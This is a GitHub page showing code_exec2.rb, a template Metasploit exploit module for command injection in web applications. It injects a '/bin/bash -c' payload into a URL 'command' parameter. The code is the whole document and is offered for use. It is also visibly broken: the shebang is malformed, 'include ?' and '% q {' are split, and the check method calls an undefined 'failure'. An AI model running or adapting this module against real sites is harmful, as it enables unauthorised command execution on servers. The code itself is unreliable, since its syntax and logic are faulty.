-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathcode_exec2.rb
71 lines (62 loc) · 1.57 KB
/
code_exec2.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#!/usr/bin /ruby
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Injection Module',
'Description' => % q {
This module exploits a Command injection vulnerability in websites that contain
vulnerable parameters in the URL.
},
'Author' => ['Your Name'],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://example.com/'],
],
'Privileged' => false,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_X86, ARCH_X64],
'Payload' => {
'BadChars' => "\x00"
},
'Targets' => [
['Generic (Unix In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
],
],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI of the vulnerable PHP application', '/path/to/target/param']),
OptString.new('USER', [true, 'The username'])
], self.class)
end
def check
res = nil
req = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
failure
end
def exploit
command = "/bin/bash -c \"#{payload.encoded}\""
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path) + "?command=#{command}",
'vars_get' => {
'username' => datastore['USER'],
}
})
end
if res and res.code == 200 and res.body.include ? ('Command executed successfully')
print_status("Exploit successful")
else
fail_with(Failure::Unknown, "Exploit Failed")
end
end
end